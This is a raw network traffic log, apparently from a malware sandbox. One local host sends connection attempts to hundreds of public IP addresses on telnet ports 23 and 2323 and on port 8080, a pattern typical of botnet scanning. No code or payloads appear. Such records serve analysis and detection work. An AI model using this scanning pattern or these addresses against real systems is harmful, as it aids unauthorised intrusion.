Feb 25, 2024 19:02:16.872400999 CET	58983	23	192.168.2.15	124.95.231.41
Feb 25, 2024 19:02:16.872409105 CET	6758	8080	192.168.2.15	31.60.28.49
Feb 25, 2024 19:02:16.872411013 CET	6758	8080	192.168.2.15	31.105.50.108
Feb 25, 2024 19:02:16.872411966 CET	6758	8080	192.168.2.15	94.107.178.102
Feb 25, 2024 19:02:16.872412920 CET	6758	8080	192.168.2.15	85.100.87.111
Feb 25, 2024 19:02:16.872411966 CET	6758	8080	192.168.2.15	62.154.45.247
Feb 25, 2024 19:02:16.872411966 CET	58983	23	192.168.2.15	97.37.215.229
Feb 25, 2024 19:02:16.872414112 CET	6758	8080	192.168.2.15	95.8.81.145
Feb 25, 2024 19:02:16.872414112 CET	6758	8080	192.168.2.15	85.112.133.208
Feb 25, 2024 19:02:16.872425079 CET	58983	23	192.168.2.15	32.220.110.69
Feb 25, 2024 19:02:16.872426033 CET	6758	8080	192.168.2.15	94.116.58.98
Feb 25, 2024 19:02:16.872426033 CET	58983	23	192.168.2.15	106.26.188.181
Feb 25, 2024 19:02:16.872427940 CET	58983	23	192.168.2.15	147.29.58.180
Feb 25, 2024 19:02:16.872431040 CET	6758	8080	192.168.2.15	94.227.168.5
Feb 25, 2024 19:02:16.872437000 CET	6758	8080	192.168.2.15	95.208.34.113
Feb 25, 2024 19:02:16.872438908 CET	6758	8080	192.168.2.15	31.207.172.121
Feb 25, 2024 19:02:16.872437000 CET	6758	8080	192.168.2.15	62.29.189.176
Feb 25, 2024 19:02:16.872442007 CET	6758	8080	192.168.2.15	62.129.54.56
Feb 25, 2024 19:02:16.872437000 CET	6758	8080	192.168.2.15	62.175.235.244
Feb 25, 2024 19:02:16.872442007 CET	6758	8080	192.168.2.15	31.101.63.42
Feb 25, 2024 19:02:16.872437000 CET	58983	2323	192.168.2.15	196.235.36.239
Feb 25, 2024 19:02:16.872437954 CET	58983	23	192.168.2.15	210.253.80.62
Feb 25, 2024 19:02:16.872437954 CET	58983	23	192.168.2.15	8.57.7.200
Feb 25, 2024 19:02:16.872437954 CET	6758	8080	192.168.2.15	94.157.50.30
Feb 25, 2024 19:02:16.872445107 CET	6758	8080	192.168.2.15	31.249.135.20
Feb 25, 2024 19:02:16.872447968 CET	6758	8080	192.168.2.15	94.77.190.249
Feb 25, 2024 19:02:16.872447968 CET	6758	8080	192.168.2.15	62.101.210.139
Feb 25, 2024 19:02:16.872447968 CET	6758	8080	192.168.2.15	62.61.245.201
Feb 25, 2024 19:02:16.872457981 CET	58983	23	192.168.2.15	141.139.0.231
Feb 25, 2024 19:02:16.872457981 CET	58983	23	192.168.2.15	119.202.195.38
Feb 25, 2024 19:02:16.872459888 CET	58983	23	192.168.2.15	186.6.251.76
Feb 25, 2024 19:02:16.872459888 CET	6758	8080	192.168.2.15	95.176.43.46
Feb 25, 2024 19:02:16.872461081 CET	58983	23	192.168.2.15	74.203.240.97
Feb 25, 2024 19:02:16.872462988 CET	6758	8080	192.168.2.15	85.59.112.107
Feb 25, 2024 19:02:16.872462988 CET	6758	8080	192.168.2.15	31.45.9.8
Feb 25, 2024 19:02:16.872474909 CET	6758	8080	192.168.2.15	85.46.123.254
Feb 25, 2024 19:02:16.872474909 CET	58983	23	192.168.2.15	24.84.30.2
Feb 25, 2024 19:02:16.872476101 CET	6758	8080	192.168.2.15	62.119.61.7
Feb 25, 2024 19:02:16.872474909 CET	6758	8080	192.168.2.15	95.147.156.244
Feb 25, 2024 19:02:16.872476101 CET	6758	8080	192.168.2.15	94.224.206.2
Feb 25, 2024 19:02:16.872481108 CET	58983	23	192.168.2.15	67.106.228.112
Feb 25, 2024 19:02:16.872488976 CET	6758	8080	192.168.2.15	85.69.152.182
Feb 25, 2024 19:02:16.872489929 CET	58983	23	192.168.2.15	76.37.91.76
Feb 25, 2024 19:02:16.872489929 CET	58983	23	192.168.2.15	218.23.131.238
Feb 25, 2024 19:02:16.872489929 CET	58983	23	192.168.2.15	92.241.156.50
Feb 25, 2024 19:02:16.872497082 CET	6758	8080	192.168.2.15	62.109.40.195
Feb 25, 2024 19:02:16.872497082 CET	6758	8080	192.168.2.15	85.163.26.241
Feb 25, 2024 19:02:16.872489929 CET	58983	23	192.168.2.15	190.148.114.69
Feb 25, 2024 19:02:16.872497082 CET	58983	2323	192.168.2.15	27.248.70.199
Feb 25, 2024 19:02:16.872494936 CET	58983	2323	192.168.2.15	35.237.210.56
Feb 25, 2024 19:02:16.872497082 CET	58983	23	192.168.2.15	190.242.194.181
Feb 25, 2024 19:02:16.872494936 CET	6758	8080	192.168.2.15	31.135.251.235
Feb 25, 2024 19:02:16.872502089 CET	6758	8080	192.168.2.15	85.32.128.171
Feb 25, 2024 19:02:16.872494936 CET	58983	23	192.168.2.15	179.176.155.83
Feb 25, 2024 19:02:16.872497082 CET	6758	8080	192.168.2.15	85.102.126.150
Feb 25, 2024 19:02:16.872502089 CET	6758	8080	192.168.2.15	62.103.143.106
Feb 25, 2024 19:02:16.872497082 CET	6758	8080	192.168.2.15	62.171.239.182
Feb 25, 2024 19:02:16.872494936 CET	6758	8080	192.168.2.15	31.161.233.120
Feb 25, 2024 19:02:16.872509003 CET	6758	8080	192.168.2.15	85.53.154.243
Feb 25, 2024 19:02:16.872494936 CET	6758	8080	192.168.2.15	31.142.248.203
Feb 25, 2024 19:02:16.872512102 CET	58983	23	192.168.2.15	81.80.156.17
Feb 25, 2024 19:02:16.872512102 CET	58983	23	192.168.2.15	46.239.143.49
Feb 25, 2024 19:02:16.872512102 CET	58983	23	192.168.2.15	25.164.88.168
Feb 25, 2024 19:02:16.872512102 CET	58983	23	192.168.2.15	133.87.69.135
Feb 25, 2024 19:02:16.872513056 CET	6758	8080	192.168.2.15	85.61.84.198
Feb 25, 2024 19:02:16.872513056 CET	6758	8080	192.168.2.15	94.106.254.195
Feb 25, 2024 19:02:16.872513056 CET	6758	8080	192.168.2.15	85.110.65.101
Feb 25, 2024 19:02:16.872513056 CET	6758	8080	192.168.2.15	95.72.174.146
Feb 25, 2024 19:02:16.872519016 CET	6758	8080	192.168.2.15	94.39.54.49
Feb 25, 2024 19:02:16.872519016 CET	58983	23	192.168.2.15	83.52.95.203
Feb 25, 2024 19:02:16.872519016 CET	6758	8080	192.168.2.15	94.8.101.143
Feb 25, 2024 19:02:16.872524023 CET	6758	8080	192.168.2.15	62.145.228.207
Feb 25, 2024 19:02:16.872524023 CET	58983	23	192.168.2.15	12.201.118.130
Feb 25, 2024 19:02:16.872524023 CET	58983	23	192.168.2.15	124.93.238.142
Feb 25, 2024 19:02:16.872524023 CET	58983	23	192.168.2.15	119.150.204.245
Feb 25, 2024 19:02:16.872526884 CET	6758	8080	192.168.2.15	85.69.9.251
Feb 25, 2024 19:02:16.872528076 CET	6758	8080	192.168.2.15	94.171.187.1
Feb 25, 2024 19:02:16.872528076 CET	58983	23	192.168.2.15	112.242.180.29
Feb 25, 2024 19:02:16.872533083 CET	6758	8080	192.168.2.15	94.188.139.242
Feb 25, 2024 19:02:16.872533083 CET	6758	8080	192.168.2.15	31.210.132.211
Feb 25, 2024 19:02:16.872533083 CET	58983	23	192.168.2.15	139.142.85.122
Feb 25, 2024 19:02:16.872539997 CET	6758	8080	192.168.2.15	85.130.94.41
Feb 25, 2024 19:02:16.872539997 CET	6758	8080	192.168.2.15	62.127.104.170
Feb 25, 2024 19:02:16.872562885 CET	6758	8080	192.168.2.15	94.156.42.45
Feb 25, 2024 19:02:16.872562885 CET	58983	23	192.168.2.15	63.57.141.67
Feb 25, 2024 19:02:16.872562885 CET	6758	8080	192.168.2.15	62.124.42.229
Feb 25, 2024 19:02:16.872562885 CET	6758	8080	192.168.2.15	62.119.176.169
Feb 25, 2024 19:02:16.872562885 CET	6758	8080	192.168.2.15	85.244.106.93
Feb 25, 2024 19:02:16.872562885 CET	6758	8080	192.168.2.15	85.190.21.31
Feb 25, 2024 19:02:16.872565985 CET	6758	8080	192.168.2.15	85.85.223.226
Feb 25, 2024 19:02:16.872565985 CET	6758	8080	192.168.2.15	95.119.187.144
Feb 25, 2024 19:02:16.872570992 CET	58983	23	192.168.2.15	139.242.184.137
Feb 25, 2024 19:02:16.872570992 CET	6758	8080	192.168.2.15	85.60.214.47
Feb 25, 2024 19:02:16.872570992 CET	6758	8080	192.168.2.15	85.214.139.217
Feb 25, 2024 19:02:16.872572899 CET	6758	8080	192.168.2.15	94.28.165.89
Feb 25, 2024 19:02:16.872574091 CET	6758	8080	192.168.2.15	95.204.212.172
Feb 25, 2024 19:02:16.872574091 CET	58983	2323	192.168.2.15	12.27.223.62
Feb 25, 2024 19:02:16.872574091 CET	6758	8080	192.168.2.15	62.4.80.227
Feb 25, 2024 19:02:16.872574091 CET	6758	8080	192.168.2.15	95.220.10.207
Feb 25, 2024 19:02:16.872592926 CET	58983	23	192.168.2.15	112.255.4.224
Feb 25, 2024 19:02:16.872606039 CET	6758	8080	192.168.2.15	95.217.146.146
Feb 25, 2024 19:02:16.872608900 CET	58983	23	192.168.2.15	156.192.188.147
Feb 25, 2024 19:02:16.872613907 CET	58983	23	192.168.2.15	112.160.217.179
Feb 25, 2024 19:02:16.872613907 CET	6758	8080	192.168.2.15	31.246.129.81
Feb 25, 2024 19:02:16.872615099 CET	6758	8080	192.168.2.15	85.227.21.157
Feb 25, 2024 19:02:16.872615099 CET	6758	8080	192.168.2.15	94.100.60.41
Feb 25, 2024 19:02:16.872613907 CET	6758	8080	192.168.2.15	95.191.186.169
Feb 25, 2024 19:02:16.872621059 CET	6758	8080	192.168.2.15	95.139.179.117
Feb 25, 2024 19:02:16.872622967 CET	6758	8080	192.168.2.15	94.172.115.70
Feb 25, 2024 19:02:16.872622967 CET	58983	23	192.168.2.15	112.98.50.171
Feb 25, 2024 19:02:16.872622967 CET	6758	8080	192.168.2.15	95.59.149.149
Feb 25, 2024 19:02:16.872622967 CET	58983	23	192.168.2.15	162.107.88.45
Feb 25, 2024 19:02:16.872622967 CET	6758	8080	192.168.2.15	94.142.123.40
Feb 25, 2024 19:02:16.872622967 CET	6758	8080	192.168.2.15	95.166.90.237
Feb 25, 2024 19:02:16.872626066 CET	6758	8080	192.168.2.15	94.132.192.133
Feb 25, 2024 19:02:16.872627974 CET	6758	8080	192.168.2.15	95.168.247.135
Feb 25, 2024 19:02:16.872627974 CET	6758	8080	192.168.2.15	62.62.104.84
Feb 25, 2024 19:02:16.872627974 CET	6758	8080	192.168.2.15	31.15.72.127
Feb 25, 2024 19:02:16.872636080 CET	6758	8080	192.168.2.15	95.243.195.101
Feb 25, 2024 19:02:16.872636080 CET	6758	8080	192.168.2.15	94.83.110.49
Feb 25, 2024 19:02:16.872637987 CET	58983	23	192.168.2.15	107.84.109.227
Feb 25, 2024 19:02:16.872637987 CET	58983	23	192.168.2.15	107.189.224.220
Feb 25, 2024 19:02:16.872647047 CET	6758	8080	192.168.2.15	62.120.0.68
Feb 25, 2024 19:02:16.872647047 CET	6758	8080	192.168.2.15	62.131.208.234
Feb 25, 2024 19:02:16.872653008 CET	6758	8080	192.168.2.15	94.230.55.112
Feb 25, 2024 19:02:16.872653961 CET	6758	8080	192.168.2.15	95.144.175.183
Feb 25, 2024 19:02:16.872653961 CET	58983	23	192.168.2.15	93.139.146.220
Feb 25, 2024 19:02:16.872653961 CET	6758	8080	192.168.2.15	62.40.252.62
Feb 25, 2024 19:02:16.872654915 CET	58983	23	192.168.2.15	36.133.142.253
Feb 25, 2024 19:02:16.872657061 CET	6758	8080	192.168.2.15	94.106.37.255
Feb 25, 2024 19:02:16.872657061 CET	58983	23	192.168.2.15	116.181.71.149
Feb 25, 2024 19:02:16.872653961 CET	6758	8080	192.168.2.15	62.90.155.170
Feb 25, 2024 19:02:16.872654915 CET	6758	8080	192.168.2.15	95.193.186.180
Feb 25, 2024 19:02:16.872661114 CET	6758	8080	192.168.2.15	94.7.137.209
Feb 25, 2024 19:02:16.872661114 CET	6758	8080	192.168.2.15	85.109.181.50
Feb 25, 2024 19:02:16.872662067 CET	6758	8080	192.168.2.15	95.66.116.8
Feb 25, 2024 19:02:16.872662067 CET	6758	8080	192.168.2.15	94.58.212.113
Feb 25, 2024 19:02:16.872662067 CET	6758	8080	192.168.2.15	85.19.247.74
Feb 25, 2024 19:02:16.872662067 CET	6758	8080	192.168.2.15	85.41.44.211
Feb 25, 2024 19:02:16.872664928 CET	6758	8080	192.168.2.15	94.91.228.143
Feb 25, 2024 19:02:16.872675896 CET	6758	8080	192.168.2.15	85.60.240.14
Feb 25, 2024 19:02:16.872675896 CET	6758	8080	192.168.2.15	62.87.99.86
Feb 25, 2024 19:02:16.872675896 CET	6758	8080	192.168.2.15	95.95.255.65
Feb 25, 2024 19:02:16.872682095 CET	6758	8080	192.168.2.15	85.129.210.197
Feb 25, 2024 19:02:16.872682095 CET	6758	8080	192.168.2.15	85.65.30.27
Feb 25, 2024 19:02:16.872682095 CET	6758	8080	192.168.2.15	62.110.133.128
Feb 25, 2024 19:02:16.872687101 CET	6758	8080	192.168.2.15	85.75.85.228
Feb 25, 2024 19:02:16.872687101 CET	6758	8080	192.168.2.15	95.179.26.21
Feb 25, 2024 19:02:16.872687101 CET	58983	23	192.168.2.15	17.204.160.10
Feb 25, 2024 19:02:16.872687101 CET	6758	8080	192.168.2.15	95.72.9.163
Feb 25, 2024 19:02:16.872689009 CET	6758	8080	192.168.2.15	62.221.229.21
Feb 25, 2024 19:02:16.872689962 CET	6758	8080	192.168.2.15	85.184.83.137
Feb 25, 2024 19:02:16.872689962 CET	58983	23	192.168.2.15	76.98.197.58
Feb 25, 2024 19:02:16.872692108 CET	6758	8080	192.168.2.15	85.135.184.117
Feb 25, 2024 19:02:16.872692108 CET	6758	8080	192.168.2.15	95.161.218.195
Feb 25, 2024 19:02:16.872692108 CET	6758	8080	192.168.2.15	62.232.149.26
Feb 25, 2024 19:02:16.872692108 CET	6758	8080	192.168.2.15	31.203.254.179
Feb 25, 2024 19:02:16.872700930 CET	58983	2323	192.168.2.15	35.94.225.176
Feb 25, 2024 19:02:16.872700930 CET	6758	8080	192.168.2.15	31.137.7.62
Feb 25, 2024 19:02:16.872700930 CET	6758	8080	192.168.2.15	85.26.27.221
Feb 25, 2024 19:02:16.872700930 CET	6758	8080	192.168.2.15	94.154.224.230
Feb 25, 2024 19:02:16.872700930 CET	58983	23	192.168.2.15	205.142.10.82
Feb 25, 2024 19:02:16.872704983 CET	6758	8080	192.168.2.15	62.195.137.75
Feb 25, 2024 19:02:16.872709990 CET	6758	8080	192.168.2.15	31.193.56.248
Feb 25, 2024 19:02:16.872709990 CET	6758	8080	192.168.2.15	62.132.238.19
Feb 25, 2024 19:02:16.872710943 CET	58983	23	192.168.2.15	138.159.127.73
Feb 25, 2024 19:02:16.872710943 CET	6758	8080	192.168.2.15	31.248.254.222
Feb 25, 2024 19:02:16.872710943 CET	6758	8080	192.168.2.15	85.16.48.182
Feb 25, 2024 19:02:16.872710943 CET	6758	8080	192.168.2.15	31.107.98.110
Feb 25, 2024 19:02:16.872710943 CET	58983	23	192.168.2.15	184.98.137.208
Feb 25, 2024 19:02:16.872710943 CET	58983	23	192.168.2.15	217.141.187.190
Feb 25, 2024 19:02:16.872711897 CET	58983	23	192.168.2.15	87.155.138.114
Feb 25, 2024 19:02:16.872715950 CET	6758	8080	192.168.2.15	31.92.242.215
Feb 25, 2024 19:02:16.872718096 CET	6758	8080	192.168.2.15	31.124.89.158
Feb 25, 2024 19:02:16.872718096 CET	6758	8080	192.168.2.15	62.27.185.86
Feb 25, 2024 19:02:16.872718096 CET	6758	8080	192.168.2.15	95.104.208.88
Feb 25, 2024 19:02:16.872718096 CET	6758	8080	192.168.2.15	85.195.222.4
Feb 25, 2024 19:02:16.872718096 CET	58983	23	192.168.2.15	182.226.92.192
Feb 25, 2024 19:02:16.872723103 CET	6758	8080	192.168.2.15	95.49.228.231
Feb 25, 2024 19:02:16.872731924 CET	6758	8080	192.168.2.15	95.143.128.209
Feb 25, 2024 19:02:16.872731924 CET	58983	23	192.168.2.15	141.159.97.208
Feb 25, 2024 19:02:16.872742891 CET	6758	8080	192.168.2.15	31.220.230.235
Feb 25, 2024 19:02:16.872744083 CET	6758	8080	192.168.2.15	31.159.170.161
Feb 25, 2024 19:02:16.872755051 CET	6758	8080	192.168.2.15	62.225.65.12
Feb 25, 2024 19:02:16.872756004 CET	58983	23	192.168.2.15	175.158.37.197
Feb 25, 2024 19:02:16.872755051 CET	6758	8080	192.168.2.15	31.252.37.133
Feb 25, 2024 19:02:16.872756004 CET	6758	8080	192.168.2.15	95.90.174.127
Feb 25, 2024 19:02:16.872762918 CET	58983	2323	192.168.2.15	125.91.199.166
Feb 25, 2024 19:02:16.872764111 CET	58983	23	192.168.2.15	140.234.229.56
Feb 25, 2024 19:02:16.872775078 CET	6758	8080	192.168.2.15	31.209.252.63
Feb 25, 2024 19:02:16.872775078 CET	6758	8080	192.168.2.15	31.217.174.188
Feb 25, 2024 19:02:16.872778893 CET	58983	23	192.168.2.15	145.250.154.15
Feb 25, 2024 19:02:16.872788906 CET	6758	8080	192.168.2.15	94.132.72.93
Feb 25, 2024 19:02:16.872796059 CET	6758	8080	192.168.2.15	95.74.60.214
Feb 25, 2024 19:02:16.872796059 CET	58983	23	192.168.2.15	97.161.242.95
Feb 25, 2024 19:02:16.872796059 CET	6758	8080	192.168.2.15	31.161.207.70
Feb 25, 2024 19:02:16.872803926 CET	6758	8080	192.168.2.15	62.21.174.228
Feb 25, 2024 19:02:16.872808933 CET	6758	8080	192.168.2.15	95.28.114.91
Feb 25, 2024 19:02:16.872813940 CET	58983	23	192.168.2.15	174.138.81.176
Feb 25, 2024 19:02:16.872813940 CET	6758	8080	192.168.2.15	85.110.30.85
Feb 25, 2024 19:02:16.872821093 CET	6758	8080	192.168.2.15	95.72.12.73
Feb 25, 2024 19:02:16.872821093 CET	6758	8080	192.168.2.15	62.32.253.184
Feb 25, 2024 19:02:16.872823954 CET	6758	8080	192.168.2.15	62.128.110.127
Feb 25, 2024 19:02:16.872829914 CET	6758	8080	192.168.2.15	95.236.134.243
Feb 25, 2024 19:02:16.872833967 CET	6758	8080	192.168.2.15	94.33.141.216
Feb 25, 2024 19:02:16.872836113 CET	58983	23	192.168.2.15	207.9.49.255
Feb 25, 2024 19:02:16.872833967 CET	6758	8080	192.168.2.15	94.131.12.117
Feb 25, 2024 19:02:16.872839928 CET	58983	23	192.168.2.15	116.243.65.150
Feb 25, 2024 19:02:16.872852087 CET	58983	23	192.168.2.15	221.146.136.175
Feb 25, 2024 19:02:16.872854948 CET	6758	8080	192.168.2.15	95.149.175.204
Feb 25, 2024 19:02:16.872858047 CET	6758	8080	192.168.2.15	94.220.170.204
Feb 25, 2024 19:02:16.872858047 CET	6758	8080	192.168.2.15	94.48.218.23
Feb 25, 2024 19:02:16.872859955 CET	58983	23	192.168.2.15	57.196.122.84
Feb 25, 2024 19:02:16.872859955 CET	58983	2323	192.168.2.15	113.138.195.209
Feb 25, 2024 19:02:16.872865915 CET	6758	8080	192.168.2.15	85.159.74.54
Feb 25, 2024 19:02:16.872865915 CET	6758	8080	192.168.2.15	85.192.38.191
Feb 25, 2024 19:02:16.872865915 CET	6758	8080	192.168.2.15	95.143.117.35
Feb 25, 2024 19:02:16.872869015 CET	6758	8080	192.168.2.15	31.243.61.173
Feb 25, 2024 19:02:16.872869968 CET	6758	8080	192.168.2.15	94.113.52.86
Feb 25, 2024 19:02:16.872874022 CET	58983	23	192.168.2.15	157.72.170.230
Feb 25, 2024 19:02:16.872879028 CET	58983	23	192.168.2.15	19.64.76.238
Feb 25, 2024 19:02:16.872885942 CET	6758	8080	192.168.2.15	85.252.205.119
Feb 25, 2024 19:02:16.872885942 CET	58983	23	192.168.2.15	169.216.0.166
Feb 25, 2024 19:02:16.872885942 CET	6758	8080	192.168.2.15	85.53.9.116
Feb 25, 2024 19:02:16.872893095 CET	6758	8080	192.168.2.15	94.79.238.254
Feb 25, 2024 19:02:16.872905970 CET	6758	8080	192.168.2.15	62.39.105.51
Feb 25, 2024 19:02:16.872910976 CET	6758	8080	192.168.2.15	31.193.145.25
Feb 25, 2024 19:02:16.872910976 CET	58983	23	192.168.2.15	189.132.231.169
Feb 25, 2024 19:02:16.872915030 CET	58983	23	192.168.2.15	104.170.200.207
Feb 25, 2024 19:02:16.872925043 CET	6758	8080	192.168.2.15	94.73.158.164
Feb 25, 2024 19:02:16.872925043 CET	58983	23	192.168.2.15	206.140.111.249
Feb 25, 2024 19:02:16.872940063 CET	6758	8080	192.168.2.15	85.211.219.60
Feb 25, 2024 19:02:16.872940063 CET	6758	8080	192.168.2.15	62.158.131.45
Feb 25, 2024 19:02:16.872940063 CET	6758	8080	192.168.2.15	94.65.87.241
Feb 25, 2024 19:02:16.872946024 CET	58983	23	192.168.2.15	94.211.106.62
Feb 25, 2024 19:02:16.872946024 CET	6758	8080	192.168.2.15	95.188.11.155
Feb 25, 2024 19:02:16.872946978 CET	6758	8080	192.168.2.15	95.182.48.86
Feb 25, 2024 19:02:16.872951984 CET	6758	8080	192.168.2.15	95.47.72.71
Feb 25, 2024 19:02:16.872951984 CET	6758	8080	192.168.2.15	94.91.154.231
Feb 25, 2024 19:02:16.872951984 CET	6758	8080	192.168.2.15	94.40.48.187
Feb 25, 2024 19:02:16.872955084 CET	6758	8080	192.168.2.15	95.0.63.114
Feb 25, 2024 19:02:16.872955084 CET	6758	8080	192.168.2.15	62.209.186.38
Feb 25, 2024 19:02:16.872960091 CET	6758	8080	192.168.2.15	94.144.54.11
Feb 25, 2024 19:02:16.872961998 CET	6758	8080	192.168.2.15	95.24.47.138
Feb 25, 2024 19:02:16.872963905 CET	6758	8080	192.168.2.15	31.146.226.239
Feb 25, 2024 19:02:16.872967958 CET	58983	23	192.168.2.15	27.58.132.47
Feb 25, 2024 19:02:16.872967958 CET	6758	8080	192.168.2.15	62.212.11.240
Feb 25, 2024 19:02:16.872975111 CET	6758	8080	192.168.2.15	95.246.22.166
Feb 25, 2024 19:02:16.872975111 CET	6758	8080	192.168.2.15	95.129.210.190
Feb 25, 2024 19:02:16.872977018 CET	6758	8080	192.168.2.15	94.58.84.30
Feb 25, 2024 19:02:16.872977972 CET	6758	8080	192.168.2.15	94.42.148.98
Feb 25, 2024 19:02:16.872977018 CET	6758	8080	192.168.2.15	94.155.91.180
Feb 25, 2024 19:02:16.872978926 CET	6758	8080	192.168.2.15	94.122.249.73
Feb 25, 2024 19:02:16.872977018 CET	6758	8080	192.168.2.15	31.91.88.150
Feb 25, 2024 19:02:16.872977972 CET	6758	8080	192.168.2.15	95.151.156.219
Feb 25, 2024 19:02:16.872977972 CET	6758	8080	192.168.2.15	62.227.240.131
Feb 25, 2024 19:02:16.872981071 CET	58983	23	192.168.2.15	161.179.38.7
Feb 25, 2024 19:02:16.872981071 CET	6758	8080	192.168.2.15	62.171.50.242
Feb 25, 2024 19:02:16.872981071 CET	6758	8080	192.168.2.15	85.129.58.96
Feb 25, 2024 19:02:16.872980118 CET	58983	23	192.168.2.15	213.209.84.144
Feb 25, 2024 19:02:16.872989893 CET	58983	2323	192.168.2.15	44.89.75.229
Feb 25, 2024 19:02:16.873001099 CET	6758	8080	192.168.2.15	85.213.48.174
Feb 25, 2024 19:02:16.873001099 CET	6758	8080	192.168.2.15	85.148.153.73
Feb 25, 2024 19:02:16.873004913 CET	6758	8080	192.168.2.15	95.140.231.214
Feb 25, 2024 19:02:16.873006105 CET	6758	8080	192.168.2.15	95.202.160.59
Feb 25, 2024 19:02:16.873009920 CET	6758	8080	192.168.2.15	85.161.198.164
Feb 25, 2024 19:02:16.873009920 CET	58983	23	192.168.2.15	103.113.121.190
Feb 25, 2024 19:02:16.873009920 CET	58983	23	192.168.2.15	212.242.189.208
Feb 25, 2024 19:02:16.873018026 CET	6758	8080	192.168.2.15	95.19.250.198
Feb 25, 2024 19:02:16.873018980 CET	58983	23	192.168.2.15	161.168.137.75
Feb 25, 2024 19:02:16.873019934 CET	6758	8080	192.168.2.15	31.196.90.53
Feb 25, 2024 19:02:16.873020887 CET	6758	8080	192.168.2.15	31.203.216.187
Feb 25, 2024 19:02:16.873019934 CET	58983	23	192.168.2.15	49.205.57.99
Feb 25, 2024 19:02:16.873018980 CET	58983	23	192.168.2.15	184.241.222.234
Feb 25, 2024 19:02:16.873018980 CET	6758	8080	192.168.2.15	95.27.133.153
Feb 25, 2024 19:02:16.873018980 CET	6758	8080	192.168.2.15	94.155.116.30
Feb 25, 2024 19:02:16.873018980 CET	6758	8080	192.168.2.15	94.84.157.150
Feb 25, 2024 19:02:16.873018980 CET	6758	8080	192.168.2.15	31.176.85.183
Feb 25, 2024 19:02:16.873018980 CET	6758	8080	192.168.2.15	94.77.104.191
Feb 25, 2024 19:02:16.873018980 CET	58983	23	192.168.2.15	176.73.70.184
Feb 25, 2024 19:02:16.873018980 CET	6758	8080	192.168.2.15	85.213.104.172
Feb 25, 2024 19:02:16.873018980 CET	6758	8080	192.168.2.15	85.19.251.249
Feb 25, 2024 19:02:16.873018980 CET	58983	23	192.168.2.15	83.93.219.189
Feb 25, 2024 19:02:16.873029947 CET	6758	8080	192.168.2.15	94.205.225.188
Feb 25, 2024 19:02:16.873033047 CET	6758	8080	192.168.2.15	94.23.170.254
Feb 25, 2024 19:02:16.873018980 CET	6758	8080	192.168.2.15	62.38.92.78
Feb 25, 2024 19:02:16.873032093 CET	6758	8080	192.168.2.15	85.5.75.81
Feb 25, 2024 19:02:16.873034954 CET	6758	8080	192.168.2.15	85.185.144.239
Feb 25, 2024 19:02:16.873018980 CET	6758	8080	192.168.2.15	85.157.202.163
Feb 25, 2024 19:02:16.873032093 CET	58983	2323	192.168.2.15	195.27.231.185
Feb 25, 2024 19:02:16.873037100 CET	6758	8080	192.168.2.15	62.36.135.158
Feb 25, 2024 19:02:16.873018980 CET	58983	23	192.168.2.15	81.111.85.237
Feb 25, 2024 19:02:16.873037100 CET	6758	8080	192.168.2.15	85.98.173.224
Feb 25, 2024 19:02:16.873054028 CET	6758	8080	192.168.2.15	62.190.43.197
Feb 25, 2024 19:02:16.873054028 CET	6758	8080	192.168.2.15	95.133.165.249
Feb 25, 2024 19:02:16.873055935 CET	58983	23	192.168.2.15	97.212.198.122
Feb 25, 2024 19:02:16.873055935 CET	6758	8080	192.168.2.15	31.195.223.178
Feb 25, 2024 19:02:16.873058081 CET	6758	8080	192.168.2.15	94.23.12.118
Feb 25, 2024 19:02:16.873058081 CET	6758	8080	192.168.2.15	62.30.68.210
Feb 25, 2024 19:02:16.873058081 CET	6758	8080	192.168.2.15	85.5.61.48
Feb 25, 2024 19:02:16.873058081 CET	58983	23	192.168.2.15	115.89.155.87
Feb 25, 2024 19:02:16.873064995 CET	6758	8080	192.168.2.15	85.236.113.5
Feb 25, 2024 19:02:16.873064995 CET	58983	23	192.168.2.15	175.111.195.58
Feb 25, 2024 19:02:16.873064995 CET	6758	8080	192.168.2.15	95.173.93.39
Feb 25, 2024 19:02:16.873064995 CET	6758	8080	192.168.2.15	31.246.215.139
Feb 25, 2024 19:02:16.873064995 CET	6758	8080	192.168.2.15	31.199.76.253
Feb 25, 2024 19:02:16.873064995 CET	58983	23	192.168.2.15	91.116.219.157
Feb 25, 2024 19:02:16.873070955 CET	6758	8080	192.168.2.15	95.50.71.231
Feb 25, 2024 19:02:16.873070955 CET	6758	8080	192.168.2.15	31.79.88.81
Feb 25, 2024 19:02:16.873073101 CET	6758	8080	192.168.2.15	85.143.188.29
Feb 25, 2024 19:02:16.873073101 CET	58983	23	192.168.2.15	114.23.140.88
Feb 25, 2024 19:02:16.873073101 CET	6758	8080	192.168.2.15	85.166.26.218
Feb 25, 2024 19:02:16.873073101 CET	6758	8080	192.168.2.15	85.100.34.121
Feb 25, 2024 19:02:16.873078108 CET	58983	23	192.168.2.15	183.14.131.216
Feb 25, 2024 19:02:16.873078108 CET	58983	2323	192.168.2.15	129.242.16.136
Feb 25, 2024 19:02:16.873078108 CET	6758	8080	192.168.2.15	85.6.248.225
Feb 25, 2024 19:02:16.873084068 CET	58983	23	192.168.2.15	45.90.242.247
Feb 25, 2024 19:02:16.873084068 CET	6758	8080	192.168.2.15	85.231.138.198
Feb 25, 2024 19:02:16.873084068 CET	6758	8080	192.168.2.15	95.104.105.175
Feb 25, 2024 19:02:16.873084068 CET	6758	8080	192.168.2.15	85.187.162.100
Feb 25, 2024 19:02:16.873100996 CET	58983	23	192.168.2.15	19.142.66.12
Feb 25, 2024 19:02:16.873100996 CET	6758	8080	192.168.2.15	85.139.126.165
Feb 25, 2024 19:02:16.873100996 CET	6758	8080	192.168.2.15	85.52.33.113
Feb 25, 2024 19:02:16.873111963 CET	6758	8080	192.168.2.15	94.46.63.124
Feb 25, 2024 19:02:16.873111963 CET	58983	23	192.168.2.15	185.84.148.70
Feb 25, 2024 19:02:16.873125076 CET	6758	8080	192.168.2.15	95.155.125.213
Feb 25, 2024 19:02:16.873125076 CET	6758	8080	192.168.2.15	31.232.250.93
Feb 25, 2024 19:02:16.873125076 CET	58983	23	192.168.2.15	58.58.234.11
Feb 25, 2024 19:02:16.873131990 CET	6758	8080	192.168.2.15	85.117.236.127
Feb 25, 2024 19:02:16.873131990 CET	6758	8080	192.168.2.15	62.8.252.6
Feb 25, 2024 19:02:16.873131990 CET	6758	8080	192.168.2.15	85.227.159.245
Feb 25, 2024 19:02:16.873131990 CET	58983	23	192.168.2.15	134.58.107.239
Feb 25, 2024 19:02:16.873131990 CET	58983	23	192.168.2.15	73.207.108.170
Feb 25, 2024 19:02:16.873131990 CET	58983	23	192.168.2.15	135.86.235.217
Feb 25, 2024 19:02:16.873131990 CET	6758	8080	192.168.2.15	95.82.212.222
